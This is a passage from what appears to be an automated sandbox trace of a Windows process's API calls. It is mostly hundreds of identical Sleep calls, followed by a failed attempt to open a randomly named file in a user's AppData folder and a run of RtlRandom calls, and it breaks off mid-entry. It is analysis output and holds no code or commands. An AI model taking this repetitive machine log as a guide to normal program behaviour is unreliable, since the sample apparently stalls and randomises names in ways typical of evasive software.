(dwMilliseconds=0x258) [0185.285] Sleep (dwMilliseconds=0x258) [0185.286] Sleep (dwMilliseconds=0x258) [0185.288] Sleep (dwMilliseconds=0x258) [0185.416] Sleep (dwMilliseconds=0x258) [0185.425] Sleep (dwMilliseconds=0x258) [0185.429] Sleep (dwMilliseconds=0x258) [0185.430] Sleep (dwMilliseconds=0x258) [0185.443] Sleep (dwMilliseconds=0x258) [0185.454] Sleep (dwMilliseconds=0x258) [0185.463] Sleep (dwMilliseconds=0x258) [0185.464] Sleep (dwMilliseconds=0x258) [0185.466] Sleep (dwMilliseconds=0x258) [0185.475] Sleep (dwMilliseconds=0x258) [0185.485] Sleep (dwMilliseconds=0x258) [0185.495] Sleep (dwMilliseconds=0x258) [0185.604] Sleep (dwMilliseconds=0x258) [0185.609] Sleep (dwMilliseconds=0x258) [0185.612] Sleep (dwMilliseconds=0x258) [0185.616] Sleep (dwMilliseconds=0x258) [0185.618] Sleep (dwMilliseconds=0x258) [0185.620] Sleep (dwMilliseconds=0x258) [0185.622] Sleep (dwMilliseconds=0x258) [0185.623] Sleep (dwMilliseconds=0x258) [0185.625] Sleep (dwMilliseconds=0x258) [0185.629] Sleep (dwMilliseconds=0x258) [0185.630] Sleep (dwMilliseconds=0x258) [0185.632] Sleep (dwMilliseconds=0x258) [0185.633] Sleep (dwMilliseconds=0x258) [0185.635] Sleep (dwMilliseconds=0x258) [0185.636] Sleep (dwMilliseconds=0x258) [0185.638] Sleep (dwMilliseconds=0x258) [0185.639] Sleep (dwMilliseconds=0x258) [0185.641] Sleep (dwMilliseconds=0x258) [0185.642] Sleep (dwMilliseconds=0x258) [0185.644] Sleep (dwMilliseconds=0x258) [0185.655] Sleep (dwMilliseconds=0x258) [0185.656] Sleep (dwMilliseconds=0x258) [0185.658] Sleep (dwMilliseconds=0x258) [0185.659] Sleep (dwMilliseconds=0x258) [0185.661] Sleep (dwMilliseconds=0x258) [0185.663] Sleep (dwMilliseconds=0x258) [0185.664] Sleep (dwMilliseconds=0x258) [0185.666] Sleep (dwMilliseconds=0x258) [0185.667] Sleep (dwMilliseconds=0x258) [0185.669] Sleep (dwMilliseconds=0x258) [0185.670] Sleep (dwMilliseconds=0x258) [0185.672] Sleep (dwMilliseconds=0x258) [0185.673] Sleep (dwMilliseconds=0x258) [0185.676] Sleep (dwMilliseconds=0x258) [0185.678] Sleep (dwMilliseconds=0x258) [0185.679] Sleep (dwMilliseconds=0x258) [0185.681] Sleep (dwMilliseconds=0x258) [0185.682] Sleep (dwMilliseconds=0x258) [0185.684] Sleep (dwMilliseconds=0x258) [0185.685] Sleep (dwMilliseconds=0x258) [0185.687] Sleep (dwMilliseconds=0x258) [0185.688] Sleep (dwMilliseconds=0x258) [0185.690] Sleep (dwMilliseconds=0x258) [0185.691] Sleep (dwMilliseconds=0x258) [0185.743] Sleep (dwMilliseconds=0x258) [0185.840] Sleep (dwMilliseconds=0x258) [0185.934] Sleep (dwMilliseconds=0x258) [0186.043] Sleep (dwMilliseconds=0x258) [0186.060] Sleep (dwMilliseconds=0x258) [0186.065] Sleep (dwMilliseconds=0x258) [0186.068] Sleep (dwMilliseconds=0x258) [0186.072] Sleep (dwMilliseconds=0x258) [0186.076] Sleep (dwMilliseconds=0x258) [0186.104] Sleep (dwMilliseconds=0x258) [0186.167] Sleep (dwMilliseconds=0x258) [0186.171] Sleep (dwMilliseconds=0x258) [0186.173] Sleep (dwMilliseconds=0x258) [0186.174] Sleep (dwMilliseconds=0x258) [0186.176] Sleep (dwMilliseconds=0x258) [0186.180] Sleep (dwMilliseconds=0x258) [0186.181] Sleep (dwMilliseconds=0x258) [0186.183] Sleep (dwMilliseconds=0x258) [0186.184] Sleep (dwMilliseconds=0x258) [0186.186] Sleep (dwMilliseconds=0x258) [0186.189] Sleep (dwMilliseconds=0x258) [0186.190] Sleep (dwMilliseconds=0x258) [0186.192] Sleep (dwMilliseconds=0x258) [0186.195] Sleep (dwMilliseconds=0x258) [0186.197] Sleep (dwMilliseconds=0x258) [0186.199] Sleep (dwMilliseconds=0x258) [0186.200] Sleep (dwMilliseconds=0x258) [0186.202] Sleep (dwMilliseconds=0x258) [0186.203] Sleep (dwMilliseconds=0x258) [0186.207] Sleep (dwMilliseconds=0x258) [0186.208] Sleep (dwMilliseconds=0x258) [0186.209] Sleep (dwMilliseconds=0x258) [0186.211] Sleep (dwMilliseconds=0x258) [0186.213] Sleep (dwMilliseconds=0x258) [0186.215] Sleep (dwMilliseconds=0x258) [0186.216] Sleep (dwMilliseconds=0x258) [0186.217] Sleep (dwMilliseconds=0x258) [0186.219] Sleep (dwMilliseconds=0x258) [0186.221] Sleep (dwMilliseconds=0x258) [0186.223] Sleep (dwMilliseconds=0x258) [0186.224] Sleep (dwMilliseconds=0x258) [0186.226] Sleep (dwMilliseconds=0x258) [0186.228] Sleep (dwMilliseconds=0x258) [0186.230] Sleep (dwMilliseconds=0x258) [0186.232] Sleep (dwMilliseconds=0x258) [0186.234] Sleep (dwMilliseconds=0x258) [0186.235] Sleep (dwMilliseconds=0x258) [0186.238] Sleep (dwMilliseconds=0x258) [0186.240] Sleep (dwMilliseconds=0x258) [0186.241] Sleep (dwMilliseconds=0x258) [0186.243] Sleep (dwMilliseconds=0x258) [0186.245] Sleep (dwMilliseconds=0x258) [0186.247] Sleep (dwMilliseconds=0x258) [0186.249] Sleep (dwMilliseconds=0x258) [0186.251] Sleep (dwMilliseconds=0x258) [0186.254] Sleep (dwMilliseconds=0x258) [0186.256] Sleep (dwMilliseconds=0x258) [0186.358] Sleep (dwMilliseconds=0x258) [0186.403] Sleep (dwMilliseconds=0x258) [0186.495] Sleep (dwMilliseconds=0x258) [0186.551] Sleep (dwMilliseconds=0x258) [0186.589] Sleep (dwMilliseconds=0x258) [0186.591] Sleep (dwMilliseconds=0x258) [0186.593] Sleep (dwMilliseconds=0x258) [0186.595] Sleep (dwMilliseconds=0x258) [0186.599] Sleep (dwMilliseconds=0x258) [0186.600] Sleep (dwMilliseconds=0x258) [0186.602] Sleep (dwMilliseconds=0x258) [0186.603] Sleep (dwMilliseconds=0x258) [0186.605] Sleep (dwMilliseconds=0x258) [0186.607] Sleep (dwMilliseconds=0x258) [0186.608] Sleep (dwMilliseconds=0x258) [0186.610] Sleep (dwMilliseconds=0x258) [0186.612] Sleep (dwMilliseconds=0x258) [0186.614] Sleep (dwMilliseconds=0x258) [0186.615] Sleep (dwMilliseconds=0x258) [0186.617] Sleep (dwMilliseconds=0x258) [0186.618] Sleep (dwMilliseconds=0x258) [0186.621] Sleep (dwMilliseconds=0x258) [0186.623] Sleep (dwMilliseconds=0x258) [0186.625] Sleep (dwMilliseconds=0x258) [0186.628] Sleep (dwMilliseconds=0x258) [0186.631] Sleep (dwMilliseconds=0x258) [0186.632] Sleep (dwMilliseconds=0x258) [0186.634] Sleep (dwMilliseconds=0x258) [0186.636] Sleep (dwMilliseconds=0x258) [0186.637] Sleep (dwMilliseconds=0x258) [0186.686] Sleep (dwMilliseconds=0x258) [0186.738] Sleep (dwMilliseconds=0x258) [0186.740] Sleep (dwMilliseconds=0x258) [0186.742] Sleep (dwMilliseconds=0x258) [0186.744] Sleep (dwMilliseconds=0x258) [0186.785] Sleep (dwMilliseconds=0x258) [0186.815] Sleep (dwMilliseconds=0x258) [0186.901] Sleep (dwMilliseconds=0x258) [0186.903] Sleep (dwMilliseconds=0x258) [0186.905] Sleep (dwMilliseconds=0x258) [0186.907] Sleep (dwMilliseconds=0x258) [0186.908] Sleep (dwMilliseconds=0x258) [0186.910] Sleep (dwMilliseconds=0x258) [0186.911] Sleep (dwMilliseconds=0x258) [0186.913] Sleep (dwMilliseconds=0x258) [0186.914] Sleep (dwMilliseconds=0x258) [0186.996] Sleep (dwMilliseconds=0x258) [0187.021] Sleep (dwMilliseconds=0x258) [0187.023] Sleep (dwMilliseconds=0x258) [0187.024] Sleep (dwMilliseconds=0x258) [0187.030] Sleep (dwMilliseconds=0x258) [0187.032] Sleep (dwMilliseconds=0x258) [0187.034] Sleep (dwMilliseconds=0x258) [0187.035] Sleep (dwMilliseconds=0x258) [0187.037] Sleep (dwMilliseconds=0x258) [0187.038] Sleep (dwMilliseconds=0x258) [0187.040] Sleep (dwMilliseconds=0x258) [0187.041] Sleep (dwMilliseconds=0x258) [0187.043] Sleep (dwMilliseconds=0x258) [0187.044] Sleep (dwMilliseconds=0x258) [0187.046] Sleep (dwMilliseconds=0x258) [0187.047] Sleep (dwMilliseconds=0x258) [0187.066] Sleep (dwMilliseconds=0x258) [0187.073] Sleep (dwMilliseconds=0x258) [0187.088] Sleep (dwMilliseconds=0x258) [0187.090] Sleep (dwMilliseconds=0x258) [0187.091] Sleep (dwMilliseconds=0x258) [0187.093] Sleep (dwMilliseconds=0x258) [0187.094] Sleep (dwMilliseconds=0x258) [0187.097] Sleep (dwMilliseconds=0x258) [0187.099] Sleep (dwMilliseconds=0x258) [0187.101] Sleep (dwMilliseconds=0x258) [0187.103] Sleep (dwMilliseconds=0x258) [0187.104] Sleep (dwMilliseconds=0x258) [0187.106] Sleep (dwMilliseconds=0x258) [0187.108] Sleep (dwMilliseconds=0x258) [0187.110] Sleep (dwMilliseconds=0x258) [0187.111] Sleep (dwMilliseconds=0x258) [0187.113] Sleep (dwMilliseconds=0x258) [0187.116] Sleep (dwMilliseconds=0x258) [0187.117] Sleep (dwMilliseconds=0x258) [0187.118] Sleep (dwMilliseconds=0x258) [0187.120] Sleep (dwMilliseconds=0x258) [0187.121] Sleep (dwMilliseconds=0x258) [0187.123] Sleep (dwMilliseconds=0x258) [0187.124] Sleep (dwMilliseconds=0x258) [0187.126] Sleep (dwMilliseconds=0x258) [0187.130] Sleep (dwMilliseconds=0x258) [0187.262] Sleep (dwMilliseconds=0x258) [0187.265] Sleep (dwMilliseconds=0x258) [0187.266] Sleep (dwMilliseconds=0x258) [0187.270] Sleep (dwMilliseconds=0x258) [0187.271] Sleep (dwMilliseconds=0x258) [0187.273] Sleep (dwMilliseconds=0x258) [0187.275] Sleep (dwMilliseconds=0x258) [0187.291] Sleep (dwMilliseconds=0x258) [0187.295] Sleep (dwMilliseconds=0x258) [0187.298] Sleep (dwMilliseconds=0x258) [0187.300] Sleep (dwMilliseconds=0x258) [0187.302] Sleep (dwMilliseconds=0x258) [0187.306] Sleep (dwMilliseconds=0x258) [0187.507] Sleep (dwMilliseconds=0x258) [0187.586] Sleep (dwMilliseconds=0x258) [0187.686] Sleep (dwMilliseconds=0x258) [0187.689] Sleep (dwMilliseconds=0x258) [0187.711] Sleep (dwMilliseconds=0x258) [0187.712] Sleep (dwMilliseconds=0x258) [0187.714] Sleep (dwMilliseconds=0x258) [0187.716] Sleep (dwMilliseconds=0x258) [0187.718] Sleep (dwMilliseconds=0x258) [0187.719] Sleep (dwMilliseconds=0x258) [0187.722] Sleep (dwMilliseconds=0x258) [0187.723] Sleep (dwMilliseconds=0x258) [0187.726] Sleep (dwMilliseconds=0x258) [0187.727] Sleep (dwMilliseconds=0x258) [0187.729] Sleep (dwMilliseconds=0x258) [0187.731] Sleep (dwMilliseconds=0x258) [0187.733] Sleep (dwMilliseconds=0x258) [0187.735] Sleep (dwMilliseconds=0x258) [0187.737] Sleep (dwMilliseconds=0x258) [0187.738] Sleep (dwMilliseconds=0x258) [0187.740] Sleep (dwMilliseconds=0x258) [0187.741] Sleep (dwMilliseconds=0x258) [0187.743] Sleep (dwMilliseconds=0x258) [0187.744] Sleep (dwMilliseconds=0x258) [0187.746] Sleep (dwMilliseconds=0x258) [0187.748] Sleep (dwMilliseconds=0x258) [0187.751] Sleep (dwMilliseconds=0x258) [0187.753] Sleep (dwMilliseconds=0x258) [0187.755] Sleep (dwMilliseconds=0x258) [0187.758] Sleep (dwMilliseconds=0x258) [0187.759] Sleep (dwMilliseconds=0x258) [0187.761] Sleep (dwMilliseconds=0x258) [0187.762] Sleep (dwMilliseconds=0x258) [0187.764] Sleep (dwMilliseconds=0x258) [0187.765] Sleep (dwMilliseconds=0x258) [0187.767] Sleep (dwMilliseconds=0x258) [0187.769] Sleep (dwMilliseconds=0x258) [0187.770] Sleep (dwMilliseconds=0x258) [0187.772] Sleep (dwMilliseconds=0x258) [0187.773] Sleep (dwMilliseconds=0x258) [0187.775] Sleep (dwMilliseconds=0x258) [0187.776] Sleep (dwMilliseconds=0x258) [0187.778] Sleep (dwMilliseconds=0x258) [0187.780] Sleep (dwMilliseconds=0x258) [0187.781] Sleep (dwMilliseconds=0x258) [0187.783] Sleep (dwMilliseconds=0x258) [0187.784] Sleep (dwMilliseconds=0x258) [0187.806] Sleep (dwMilliseconds=0x258) [0187.808] Sleep (dwMilliseconds=0x258) [0187.810] Sleep (dwMilliseconds=0x258) [0187.812] Sleep (dwMilliseconds=0x258) [0187.813] Sleep (dwMilliseconds=0x258) [0187.816] Sleep (dwMilliseconds=0x258) [0187.818] Sleep (dwMilliseconds=0x258) [0187.819] Sleep (dwMilliseconds=0x258) [0187.821] Sleep (dwMilliseconds=0x258) [0187.823] Sleep (dwMilliseconds=0x258) [0187.825] Sleep (dwMilliseconds=0x258) [0187.827] Sleep (dwMilliseconds=0x258) [0187.828] Sleep (dwMilliseconds=0x258) [0187.830] Sleep (dwMilliseconds=0x258) [0187.833] Sleep (dwMilliseconds=0x258) [0187.923] Sleep (dwMilliseconds=0x258) [0187.925] Sleep (dwMilliseconds=0x258) [0187.927] Sleep (dwMilliseconds=0x258) [0187.929] Sleep (dwMilliseconds=0x258) [0187.931] Sleep (dwMilliseconds=0x258) [0187.933] Sleep (dwMilliseconds=0x258) [0187.934] Sleep (dwMilliseconds=0x258) [0187.936] Sleep (dwMilliseconds=0x258) [0187.937] Sleep (dwMilliseconds=0x258) [0187.939] Sleep (dwMilliseconds=0x258) [0187.940] Sleep (dwMilliseconds=0x258) [0187.942] Sleep (dwMilliseconds=0x258) [0187.943] Sleep (dwMilliseconds=0x258) [0187.946] Sleep (dwMilliseconds=0x258) [0187.947] Sleep (dwMilliseconds=0x258) [0187.949] Sleep (dwMilliseconds=0x258) [0187.951] Sleep (dwMilliseconds=0x258) [0187.956] Sleep (dwMilliseconds=0x258) [0188.059] Sleep (dwMilliseconds=0x258) [0188.082] Sleep (dwMilliseconds=0x258) [0188.084] Sleep (dwMilliseconds=0x258) [0188.092] Sleep (dwMilliseconds=0x258) [0188.214] Sleep (dwMilliseconds=0x258) [0188.375] Sleep (dwMilliseconds=0x258) [0188.418] Sleep (dwMilliseconds=0x258) [0188.420] Sleep (dwMilliseconds=0x258) [0188.422] Sleep (dwMilliseconds=0x258) [0188.424] Sleep (dwMilliseconds=0x258) [0188.426] Sleep (dwMilliseconds=0x258) [0188.427] Sleep (dwMilliseconds=0x258) [0188.429] Sleep (dwMilliseconds=0x258) [0188.432] Sleep (dwMilliseconds=0x258) [0188.435] Sleep (dwMilliseconds=0x258) [0188.439] Sleep (dwMilliseconds=0x258) [0188.440] Sleep (dwMilliseconds=0x258) [0188.442] Sleep (dwMilliseconds=0x258) [0188.443] Sleep (dwMilliseconds=0x258) [0188.446] Sleep (dwMilliseconds=0x258) [0188.448] Sleep (dwMilliseconds=0x258) [0188.449] Sleep (dwMilliseconds=0x258) [0188.451] Sleep (dwMilliseconds=0x258) [0188.452] Sleep (dwMilliseconds=0x258) [0188.454] Sleep (dwMilliseconds=0x258) [0188.456] Sleep (dwMilliseconds=0x258) [0188.484] Sleep (dwMilliseconds=0x258) [0188.486] Sleep (dwMilliseconds=0x258) [0188.489] Sleep (dwMilliseconds=0x258) [0188.492] Sleep (dwMilliseconds=0x258) [0188.494] Sleep (dwMilliseconds=0x258) [0188.495] Sleep (dwMilliseconds=0x258) [0188.499] Sleep (dwMilliseconds=0x258) [0188.501] Sleep (dwMilliseconds=0x258) [0188.502] Sleep (dwMilliseconds=0x258) [0188.504] Sleep (dwMilliseconds=0x258) [0188.505] Sleep (dwMilliseconds=0x258) [0188.507] Sleep (dwMilliseconds=0x258) [0188.508] Sleep (dwMilliseconds=0x258) [0188.510] Sleep (dwMilliseconds=0x258) [0188.512] Sleep (dwMilliseconds=0x258) [0188.513] Sleep (dwMilliseconds=0x258) [0188.515] Sleep (dwMilliseconds=0x258) [0188.517] Sleep (dwMilliseconds=0x258) [0188.518] Sleep (dwMilliseconds=0x258) [0188.585] Sleep (dwMilliseconds=0x258) [0188.587] Sleep (dwMilliseconds=0x258) [0188.588] Sleep (dwMilliseconds=0x258) [0188.590] Sleep (dwMilliseconds=0x258) [0188.591] Sleep (dwMilliseconds=0x258) [0188.593] Sleep (dwMilliseconds=0x258) [0188.596] Sleep (dwMilliseconds=0x258) [0188.597] Sleep (dwMilliseconds=0x258) [0188.604] Sleep (dwMilliseconds=0x258) [0188.606] Sleep (dwMilliseconds=0x258) [0188.608] Sleep (dwMilliseconds=0x258) [0188.611] Sleep (dwMilliseconds=0x258) [0188.613] Sleep (dwMilliseconds=0x258) [0188.615] Sleep (dwMilliseconds=0x258) [0188.711] Sleep (dwMilliseconds=0x258) [0188.742] Sleep (dwMilliseconds=0x258) [0188.795] Sleep (dwMilliseconds=0x258) [0188.867] Sleep (dwMilliseconds=0x258) [0188.894] Sleep (dwMilliseconds=0x258) [0188.897] Sleep (dwMilliseconds=0x258) [0188.899] Sleep (dwMilliseconds=0x258) [0188.902] Sleep (dwMilliseconds=0x258) [0188.904] Sleep (dwMilliseconds=0x258) [0188.906] Sleep (dwMilliseconds=0x258) [0188.909] Sleep (dwMilliseconds=0x258) [0188.910] Sleep (dwMilliseconds=0x258) [0188.912] Sleep (dwMilliseconds=0x258) [0188.913] Sleep (dwMilliseconds=0x258) [0188.917] Sleep (dwMilliseconds=0x258) [0188.920] Sleep (dwMilliseconds=0x258) [0188.922] Sleep (dwMilliseconds=0x258) [0188.923] Sleep (dwMilliseconds=0x258) [0188.925] Sleep (dwMilliseconds=0x258) [0188.927] Sleep (dwMilliseconds=0x258) [0188.928] Sleep (dwMilliseconds=0x258) [0188.930] Sleep (dwMilliseconds=0x258) [0188.932] Sleep (dwMilliseconds=0x258) [0188.934] Sleep (dwMilliseconds=0x258) [0188.936] Sleep (dwMilliseconds=0x258) [0188.937] Sleep (dwMilliseconds=0x258) [0188.939] Sleep (dwMilliseconds=0x258) [0188.940] Sleep (dwMilliseconds=0x258) [0188.942] Sleep (dwMilliseconds=0x258) [0188.943] Sleep (dwMilliseconds=0x258) [0188.945] Sleep (dwMilliseconds=0x258) [0188.946] Sleep (dwMilliseconds=0x258) [0188.948] Sleep (dwMilliseconds=0x258) [0188.950] Sleep (dwMilliseconds=0x258) [0188.952] Sleep (dwMilliseconds=0x258) [0188.954] Sleep (dwMilliseconds=0x258) [0188.956] Sleep (dwMilliseconds=0x258) [0188.958] Sleep (dwMilliseconds=0x258) [0188.959] Sleep (dwMilliseconds=0x258) [0188.961] Sleep (dwMilliseconds=0x258) [0188.962] Sleep (dwMilliseconds=0x258) [0188.964] Sleep (dwMilliseconds=0x258) [0188.966] Sleep (dwMilliseconds=0x258) [0188.967] Sleep (dwMilliseconds=0x258) [0189.023] Sleep (dwMilliseconds=0x258) [0189.024] Sleep (dwMilliseconds=0x258) [0189.026] Sleep (dwMilliseconds=0x258) [0189.028] Sleep (dwMilliseconds=0x258) [0189.032] Sleep (dwMilliseconds=0x258) [0189.033] Sleep (dwMilliseconds=0x258) [0189.035] Sleep (dwMilliseconds=0x258) [0189.037] Sleep (dwMilliseconds=0x258) [0189.038] Sleep (dwMilliseconds=0x258) [0189.040] Sleep (dwMilliseconds=0x258) [0189.042] Sleep (dwMilliseconds=0x258) [0189.043] Sleep (dwMilliseconds=0x258) [0189.045] Sleep (dwMilliseconds=0x258) [0189.047] Sleep (dwMilliseconds=0x258) [0189.049] Sleep (dwMilliseconds=0x258) [0189.051] Sleep (dwMilliseconds=0x258) [0189.052] Sleep (dwMilliseconds=0x258) [0189.140] Sleep (dwMilliseconds=0x258) [0189.142] Sleep (dwMilliseconds=0x258) [0189.143] Sleep (dwMilliseconds=0x258) [0189.146] Sleep (dwMilliseconds=0x258) [0189.148] Sleep (dwMilliseconds=0x258) [0189.150] Sleep (dwMilliseconds=0x258) [0189.151] Sleep (dwMilliseconds=0x258) [0189.153] Sleep (dwMilliseconds=0x258) [0189.155] Sleep (dwMilliseconds=0x258) [0189.295] Sleep (dwMilliseconds=0x258) [0189.356] Sleep (dwMilliseconds=0x258) [0189.454] Sleep (dwMilliseconds=0x258) [0189.517] Sleep (dwMilliseconds=0x258) [0189.519] Sleep (dwMilliseconds=0x258) [0189.520] Sleep (dwMilliseconds=0x258) [0189.524] Sleep (dwMilliseconds=0x258) [0189.528] Sleep (dwMilliseconds=0x258) [0189.532] Sleep (dwMilliseconds=0x258) [0189.534] Sleep (dwMilliseconds=0x258) [0189.537] Sleep (dwMilliseconds=0x258) [0189.539] Sleep (dwMilliseconds=0x258) [0189.543] Sleep (dwMilliseconds=0x258) [0189.546] Sleep (dwMilliseconds=0x258) [0189.549] Sleep (dwMilliseconds=0x258) [0189.552] Sleep (dwMilliseconds=0x258) [0189.554] Sleep (dwMilliseconds=0x258) [0189.555] Sleep (dwMilliseconds=0x258) [0189.557] Sleep (dwMilliseconds=0x258) [0189.560] Sleep (dwMilliseconds=0x258) [0189.562] Sleep (dwMilliseconds=0x258) [0189.563] Sleep (dwMilliseconds=0x258) [0189.565] Sleep (dwMilliseconds=0x258) [0189.567] Sleep (dwMilliseconds=0x258) [0189.569] Sleep (dwMilliseconds=0x258) [0189.571] Sleep (dwMilliseconds=0x258) [0189.573] Sleep (dwMilliseconds=0x258) [0189.575] Sleep (dwMilliseconds=0x258) [0189.576] Sleep (dwMilliseconds=0x258) [0189.578] Sleep (dwMilliseconds=0x258) [0189.580] Sleep (dwMilliseconds=0x258) [0189.582] Sleep (dwMilliseconds=0x258) [0189.584] Sleep (dwMilliseconds=0x258) [0189.586] Sleep (dwMilliseconds=0x258) [0189.589] Sleep (dwMilliseconds=0x258) [0189.591] Sleep (dwMilliseconds=0x258) [0189.592] Sleep (dwMilliseconds=0x258) [0189.595] Sleep (dwMilliseconds=0x258) [0189.597] Sleep (dwMilliseconds=0x258) [0189.599] Sleep (dwMilliseconds=0x258) [0189.601] Sleep (dwMilliseconds=0x258) [0189.603] Sleep (dwMilliseconds=0x258) [0189.605] Sleep (dwMilliseconds=0x258) [0189.606] Sleep (dwMilliseconds=0x258) [0189.609] Sleep (dwMilliseconds=0x258) [0189.610] Sleep (dwMilliseconds=0x258) [0189.612] Sleep (dwMilliseconds=0x258) [0189.614] Sleep (dwMilliseconds=0x258) [0189.615] Sleep (dwMilliseconds=0x258) [0189.617] Sleep (dwMilliseconds=0x258) [0189.687] Sleep (dwMilliseconds=0x258) [0189.690] Sleep (dwMilliseconds=0x258) [0189.692] Sleep (dwMilliseconds=0x258) [0189.694] Sleep (dwMilliseconds=0x258) [0189.695] Sleep (dwMilliseconds=0x258) [0189.697] Sleep (dwMilliseconds=0x258) [0189.699] Sleep (dwMilliseconds=0x258) [0189.700] Sleep (dwMilliseconds=0x258) [0189.702] Sleep (dwMilliseconds=0x258) [0189.703] Sleep (dwMilliseconds=0x258) [0189.705] Sleep (dwMilliseconds=0x258) [0189.707] Sleep (dwMilliseconds=0x258) [0189.709] Sleep (dwMilliseconds=0x258) [0189.710] Sleep (dwMilliseconds=0x258) [0189.712] Sleep (dwMilliseconds=0x258) [0189.714] Sleep (dwMilliseconds=0x258) [0189.717] Sleep (dwMilliseconds=0x258) [0189.784] Sleep (dwMilliseconds=0x258) [0189.785] Sleep (dwMilliseconds=0x258) [0189.788] Sleep (dwMilliseconds=0x258) [0189.789] Sleep (dwMilliseconds=0x258) [0189.791] Sleep (dwMilliseconds=0x258) [0189.793] Sleep (dwMilliseconds=0x258) [0189.797] Sleep (dwMilliseconds=0x258) [0189.799] Sleep (dwMilliseconds=0x258) [0189.801] Sleep (dwMilliseconds=0x258) [0189.803] Sleep (dwMilliseconds=0x258) [0189.805] Sleep (dwMilliseconds=0x258) [0189.898] Sleep (dwMilliseconds=0x258) [0189.964] Sleep (dwMilliseconds=0x258) [0189.965] Sleep (dwMilliseconds=0x258) [0189.967] Sleep (dwMilliseconds=0x258) [0189.968] Sleep (dwMilliseconds=0x258) [0189.970] Sleep (dwMilliseconds=0x258) [0189.972] Sleep (dwMilliseconds=0x258) [0189.974] Sleep (dwMilliseconds=0x258) [0189.976] Sleep (dwMilliseconds=0x258) [0189.977] Sleep (dwMilliseconds=0x258) [0189.979] Sleep (dwMilliseconds=0x258) [0189.980] Sleep (dwMilliseconds=0x258) [0189.982] Sleep (dwMilliseconds=0x258) [0189.984] Sleep (dwMilliseconds=0x258) [0189.985] Sleep (dwMilliseconds=0x258) [0189.987] Sleep (dwMilliseconds=0x258) [0189.988] Sleep (dwMilliseconds=0x258) [0189.990] Sleep (dwMilliseconds=0x258) [0189.991] Sleep (dwMilliseconds=0x258) [0189.999] Sleep (dwMilliseconds=0x258) [0190.069] Sleep (dwMilliseconds=0x258) [0190.074] Sleep (dwMilliseconds=0x258) [0190.075] Sleep (dwMilliseconds=0x258) [0190.079] Sleep (dwMilliseconds=0x258) [0190.083] Sleep (dwMilliseconds=0x258) [0190.084] Sleep (dwMilliseconds=0x258) [0190.085] Sleep (dwMilliseconds=0x258) [0190.298] Sleep (dwMilliseconds=0x258) [0190.454] Sleep (dwMilliseconds=0x258) [0190.504] Sleep (dwMilliseconds=0x258) [0190.506] Sleep (dwMilliseconds=0x258) [0190.507] Sleep (dwMilliseconds=0x258) [0190.509] Sleep (dwMilliseconds=0x258) [0190.511] Sleep (dwMilliseconds=0x258) [0190.512] Sleep (dwMilliseconds=0x258) [0190.514] Sleep (dwMilliseconds=0x258) [0190.515] Sleep (dwMilliseconds=0x258) [0190.517] Sleep (dwMilliseconds=0x258) [0190.518] Sleep (dwMilliseconds=0x258) [0190.520] Sleep (dwMilliseconds=0x258) [0190.522] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x26) returned 0x9211840 [0190.522] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6d29cd60 [0190.523] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x114) returned 0x9211890 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4ef5a78 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc584619a [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x47cea5a8 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x19a61b40 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x26feaa8d [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbc8ace9 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x43a644d8 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x59aba93e [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3916e652 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1fde1635 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x14ab3890 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb74bec1f [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf4837260 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfe326b37 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc49d7b9b [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb9ff9d5f [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x302dc92b [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x93f4e876 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xef0cb798 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa9712205 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4ec78f7e [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5c1fcd35 [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x16769c [0190.523] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe9c2a052 [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdc26aa4d [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x54347755 [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xace1ade6 [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1e13e07a [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa3fd9f3c [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbf93a343 [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7bc805c3 [0190.524] RtlRandom (in: 